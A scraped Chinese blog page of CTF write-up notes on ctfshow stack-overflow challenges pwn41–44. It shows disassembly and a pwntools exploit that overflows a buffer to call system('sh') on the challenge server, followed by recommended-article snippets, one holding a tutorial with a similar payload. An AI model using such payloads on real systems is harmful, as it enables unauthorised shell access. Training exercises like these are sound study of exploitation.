ctfshow做题笔记—栈溢出—pwn41~pwn44(创作纪念日更新)

已于 2025-02-07 20:36:56 修改
阅读量1k 收藏 7
点赞数 16
CC 4.0 BY-SA版权
文章标签: 笔记 学习
于 2025-02-07 20:35:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yilanchia/article/details/145500730

目录

前言

一、pwn41(32位的 system(); 但是没"/bin/sh" ,好像有其他的可以替代)

二、pwn42(64位的 system(); 但是没"/bin/sh" ,好像有其他的可以替代)

三、pwn43(32位的 system(); 但是好像没"/bin/sh" 上面的办法不行了,想想办法)

四、pwn44(64位的 system(); 但是好像没"/bin/sh" 上面的办法不行了,想想办法)

前言

到128创作纪念日了,继续记录前几天做的栈溢出题目吧。

一、pwn41(32位的 system(); 但是没"/bin/sh" ,好像有其他的可以替代)

先在ida里看一下,啧,有个buf:

-00000012 buf             db ?

-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)

0x12+0x4

打开hint函数:

int hint()
{
  const char *v0; // eax@1

  v0 = (const char *)_x86_get_pc_thunk_ax();
  system(&v0[(_DWORD)&aEchoFlag[-134520832] + 6819]);
  return 0;
}

System 函数的地址:.plt:080483D0 _system         proc near   hint+1D_x0019_p   

0x80483D0

看一看useful函数(一定很useful)

int useful()
{
  const char *v0; // eax@1

  v0 = (const char *)_x86_get_pc_thunk_ax();
  return printf(&v0[(_DWORD)&aSh[-134520832] + 6772]);
}

隐隐约约有个sh,学习一下知识点:

/bin/sh 和 sh 的关系

/bin/sh:是系统中默认 Shell 解释器的绝对路径,通常是一个指向具体 Shell 的符号链接(如 dash、bash 等)。

sh:是一个 命令名称,通过环境变量 PATH 查找可执行文件。若 PATH 包含 /bin,则 sh 实际会调用 /bin/sh。

所以找到它的地址直接用就好。

0x80487BA

EXP:

from pwn import *
p=remote("pwn.challenge.ctf.show",28136)
payload=(0x12+0x4)*b'a'+p32(0x80483D0)+b'a'*0x4+p32(0x80487BA)
p.sendline(payload)
p.interactive()

二、pwn42(64位的 system(); 但是没"/bin/sh" ,好像有其他的可以替代)

巩固知识,所以先打开ida看一看吧。

最低0.47元/天 解锁文章

200万优质内容无限畅学
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 2447
本文主要详解CTFshowpwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
ctfshow做题笔记栈溢出pwn65~pwn68
Yilanchia的博客
03-09 764
首先这道题并没有开启NX,我们任然可以注入shellcode,但是我们拟在 var_1010 中写入shellcode的地址并执行,因为程序最后读取了一个地址然后执行,这里可以执行shellcode,但是shellcode的参数写在哪里呢,似乎seed是个不错的选则,但是seed的准确地址我们无从得知,所以这个滑坡可以起到很大的作用,特别注意下面的类似的代码,cdqe 是一条指令,它的作用是将 32 位寄存器 EAX 的值扩展到 64 位寄存器 RAX 中。3是一个定值,就是v2的地址到seed的距离。
CTFshow-pwn入门-栈溢出pwn43-pwn44
你们de4月天的博客
12-27 1868
CTFshow-pwn入门-栈溢出pwn43-pwn44
CTFshow-PWN-栈溢出pwn41-pwn42)
Welcome To Myon'Blog !
04-24 907
32位的 system();但是没"/bin/sh" ,好像有其他的可以替代检查一下:32 位程序ida32 分析:跟进 ctfshow 函数:存在栈溢出buf 到栈底距离:0x12存在 system 函数:system 函数地址:0x80483D0但是并未找到 /bin/sh找到了一个 useful 函数:该函数调用了 printf 函数,并传入字符串 "sh" 作为参数,然后将 printf 函数的返回值作为 useful 函数的返回值。
CTFshow-PWN-栈溢出pwn44
Welcome To Myon'Blog !
04-25 1016
在这个 payload 中,由于 rdi 寄存器已经被设置为 buf2_addr 的值,我们在调用 gets() 函数之后并不需要返回到原来的函数中,而在调用 system() 函数之前,我们已经将 buf2_addr 的值再次放入栈中。因此,在这里两个 p64(ret_addr) 可以被省略,因为在调用 gets() 函数和 system() 函数之间并不需要进行额外的栈调整。BSS 段是用来存储未初始化的全局变量和静态变量的,操作系统在程序加载时会为这些变量分配内存并将其初始化为零或空指针。
CTFshow-pwn入门-栈溢出pwn41-pwn42
你们de4月天的博客
12-27 1240
CTFshow-pwn入门-栈溢出pwn41-pwn42
pwn练习题
WuMing_Z的博客
02-23 2488
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
Pwn常见利用方式总结
若有战,召必回
12-14 1277
目录穿越此题是NKCTF2024 httpd这道题题目分析%[^ ] 是C语言中 scanf 和 sscanf 函数用于格式化输入的格式化字符串中的一个格式说明符。具体地,%[^ ] 表示要读取的输入字符序列直到遇到第一个空格字符(空格字符之前的字符),然后将其存储到对应的变量中。其中 ^ 符号表示取反,[^ ] 表示除了空格之外的所有字符。这样的格式化说明符通常用于读取字符串中的单词或特定字符之间的内容。
buuctf习题pwn41~50)
yw__y的博客
09-27 518
堆的题还没写
ctfshow刷题笔记栈溢出pwn53~pwn56
Yilanchia的博客
02-19 781
它先循环读取,每次一个字节,直到读取到换行符(ascll:10 0xa),循环读取才会结束,__isoc99_sscanf(v2,”%d”,&nbytes)这个函数从v2中读取一个整数,存放到nbytes变量中,这个变量决定了我们能够向buf写入的数据大小,我们想要造成溢出,这个数据就需要大一点,接下来,就去比较s1与global_canary是否相同,相同这个函数才能正常返回,造成溢出。,应该需要找到flag之间的关系。主要是提示用户输入数据,输出欢迎信息并让用户输入密码,进行比较,以便执行flag。
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1630
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))
Mr_Fmnwon的博客
05-31 5766
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。
第19章 枚举器和迭代器 笔记
z2014z的博客
08-05 609
下面是使用 foreach 语句遍历数组的示例。数组可以使用这种方式访问,是因为:数组提供了对象。枚举器知道数组中元素的次序,并依次返回数组中的元素。对于有枚举器的类型而言,使用 GetEnumerator 方法来获取其拥有的枚举器,实现该方法的类型称为。数组就是可枚举类型。
笔记】ROS1|5 ARP攻击Turtlebot3汉堡Burger并解析移动报文【旧文转载】
shandianchengzi的博客
08-04 554
本文介绍了如何使用ARP攻击技术干扰Turtlebot3汉堡机器人的ROS通信。作者首先讲解了ARP协议的基本原理和攻击依据,然后通过实验演示了如何利用arpspoof工具实施ARP欺骗攻击,包括干扰普通主机上网和小车与控制机的通信。文章提供了详细的实验步骤和思考题,并建议读者在虚拟机环境下进行实践。实验结果显示,通过持续发送虚假ARP响应包可以成功劫持网络通信,开启IP转发后虽能恢复但会降低网速。最后作者还演示了如何解析被攻击机器人的移动控制报文。
学习笔记090——Ubuntu 中 UFW 防火墙的使用
code__bee的博客
08-01 362
【代码】学习笔记090——Ubuntu 中 UFW 防火墙的使用。
PYQT学习笔记:signal 和 slot(信号与槽)
最新发布
qq_52251819的博客
08-05 266
通过 button.clicked.connect(on_button_clicked) 语句将信号与槽关联。当按钮被点击(发出 clicked 信号)时,执行 on_button_clicked 函数。在示例中,on_button_clicked() 就是一个槽函数,用于处理按钮点击事件。在示例中,button.clicked 就是一个信号,表示 “按钮被点击” 这个事件。每当点一次“统计”按钮,终端就会打印一次“按钮被点击了”支持一个信号连接多个槽,或多个信号连接同一个槽。槽是用于接收信号并处理的。
笔记:webpack项目优化图片体积大小时 遇到 图片无法正常显示
sky8880的博客
08-04 181
在使用url-loader和file-loader处理图片时,图片无法显示,src属性变成了[object Module]。因此,在引入图片时,如果使用CommonJS的方式(require)去引入一个ES模块导出的图片,就会得到[object Module]。问题:我是用 url-loader 和 file-loader压缩图片 但是 有一些图片无法显示 在src中是[object Module] 所以导致无法加载(有的图片可以有的不行 主要针对小的图片base64的图片)
电力系统分析学习笔记
zxjiaya的博客
08-02 613
本文总结了电力系统分析的核心知识点:1)电力线路电容特性分析,指出电缆线路电容比架空线路大;2)三相功率关系推导,包含线/相电压转换和阻抗计算;3)标幺值计算法原理,强调基准量选择方法;4)变压器阻抗折算的简化技巧,建议采用平均额定电压;5)两种标幺值计算方法对比。重点阐述了电容特性、功率方程、标幺值转换等电力系统分析基础理论,为后续短路计算等应用提供理论支撑。
LLM微调笔记
qq_44899247的博客
08-02 220
微调相当于用少量特定数据集在预训练模型(如 Qwen、DeepSeek 等)上进一步训练,让模型更贴合新数据集的内容。微调主要分为全量微调和参数高效微调(PEFT),其中 PEFT 中最常用的是 LoRA:其核心是在模型关键层(如注意力层)的高秩权重矩阵中插入两个低秩矩阵(A 和 B),训练时仅更新这两个低秩矩阵的参数(参数量远小于原矩阵,例如原矩阵维度为 d×d 时,低秩矩阵为 d×r 和 r×d,r 远小于 d),以此大幅降低计算成本。适合自己从零开始看的llm微调知识点。
ctfshow pwn入门栈溢出
04-02
<think>嗯,用户想学习CTFShow平台上的PWN入门级栈溢出攻击技巧,包括教程、原理和实例。好的,我需要先回顾栈溢出的基本原理,然后结合CTFShow的题目例子来解释。首先,栈溢出是覆盖返回地址来控制程序流程,对吧?比如覆盖返回地址为system函数,然后传入/bin/sh的参数。 那我要分步骤来讲解。可能先讲栈的结构,比如函数调用时的返回地址、局部变量这些。然后,如何通过溢出覆盖返回地址。可能需要提到缓冲区溢出,比如使用gets、scanf等不安全的函数导致输入超出缓冲区大小。 接下来,结合CTFShow的题目,比如pwn41pwn48,这些题目可能涉及不同的利用技巧。例如,引用4提到bss段的buf2可以用来存储输入数据,传入/bin/sh给system。这可能是一个例子,需要具体说明如何构造payload,将参数放入合适的位置,并跳转到system函数。 用户可能还需要了解如何找到system函数的地址,以及如何获取/bin/sh字符串的地址。可能需要用到ROP技术,或者题目中已经提供了这些地址。另外,要注意内存保护机制,比如NX、ASLR,但入门题目可能这些保护都没开,所以可以直接执行栈上的代码或者覆盖返回地址。 然后,可能需要给出一个具体的例子,比如如何利用栈溢出执行system("/bin/sh")。步骤大概是:确定溢出点,计算偏移量,找到system地址,找到/bin/sh字符串地址,构造payload填充缓冲区并覆盖返回地址为system,同时传递参数。 此外,用户可能需要知道如何调试,使用gdb或者其他工具来确定偏移量和地址是否正确。还有,如何构造payload,比如使用Python的struct模块来打包地址为大端或小端格式,取决于目标架构。 可能的问题点包括:确定偏移量的正确位置,处理地址中的空字符,确保参数正确传递(比如32位和64位传参方式不同)。例如,32位下参数在栈中,而64位可能使用寄存器。但CTFShow的题目可能都是32位的,或者需要根据具体情况调整。 最后,要提醒用户注意实践时的细节,比如输入的处理,避免截断,以及利用现有的函数和字符串。可能还需要提到如何查找gadgets,但入门题可能不需要复杂的ROP链,直接覆盖返回地址即可。 总结一下,回答的结构应该是先讲原理,再结合实例分步骤说明,最后给出相关问题和引用。需要确保LaTeX格式正确,比如寄存器用$eax$,地址用$0xdeadbeef$这样的格式。代码块用Python示例如何生成payload,可能还要提到如何利用题目中的特定函数或缓冲区。</think>### CTFShow PWN入门 栈溢出攻击技巧解析 #### 一、栈溢出基本原理 栈溢出是通过覆盖函数返回地址实现控制流劫持的技术。当程序使用不安全函数(如`gets`/`scanf`)时,若未对输入长度做限制,攻击者可构造超长输入覆盖栈帧中的返回地址,使其指向恶意代码或系统函数。例如,覆盖返回地址为`system("/bin/sh")`可实现获取shell[^4]。 栈帧结构示例: $$ \text{低地址} \rightarrow \text{缓冲区} \rightarrow \text{EBP} \rightarrow \text{返回地址} \rightarrow \text{高地址} $$ #### 二、攻击步骤拆解 1. **确定溢出点**:通过调试工具(如`gdb`)计算缓冲区到返回地址的偏移量。 - 使用`pattern create`生成测试字符串,观察崩溃时寄存器的值。 2. **获取关键地址**: - `system`函数地址:通过`objdump -d`或`gdb`的`p system`获取。 - `/bin/sh`字符串地址:若程序中存在可直接引用,否则需自行写入。 3. **构造Payload**: - 填充缓冲区至返回地址位置。 - 覆盖返回地址为`system`地址。 - 传递参数(如`/bin/sh`地址)。 #### 三、实例分析(以CTFShow pwn41为例) **题目场景**: 程序中存在`buf2`缓冲区(位于.bss段),可利用其存储`/bin/sh`字符串,并通过栈溢出调用`system`。 **攻击流程**: 1. **计算偏移量**: 通过调试确定`buf`到返回地址的偏移为`140`字节。 2. **构造Payload**: ```python from pwn import * system_addr = 0x08048460 # system函数地址 buf2_addr = 0x0804A080 # buf2地址 payload = b'A' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(buf2_addr) # p32(0xdeadbeef)为system返回地址,此处无意义 # p32(buf2_addr)为system的参数地址 ``` 3. **写入`/bin/sh`到buf2**: 若程序提供输入点,可提前将`/bin/sh`写入`buf2`。 #### 四、关键知识点 1. **函数调用约定**: - 32位程序:参数通过栈传递,调用格式为`system(返回地址, 参数)`。 - 64位程序:参数优先通过寄存器(`rdi`, `rsi`等)传递,需用ROP链控制。 2. **内存保护绕过**: - 若开启NX(栈不可执行),需通过ROP实现攻击。 - 若开启ASLR,需泄露地址或使用固定地址函数。 #### 五、防御与优化 - 使用安全函数(如`fgets`替代`gets`)。 - 开启编译保护选项(`-fstack-protector`)。 - 地址随机化(ASLR)和栈不可执行(NX)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yilanchia

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值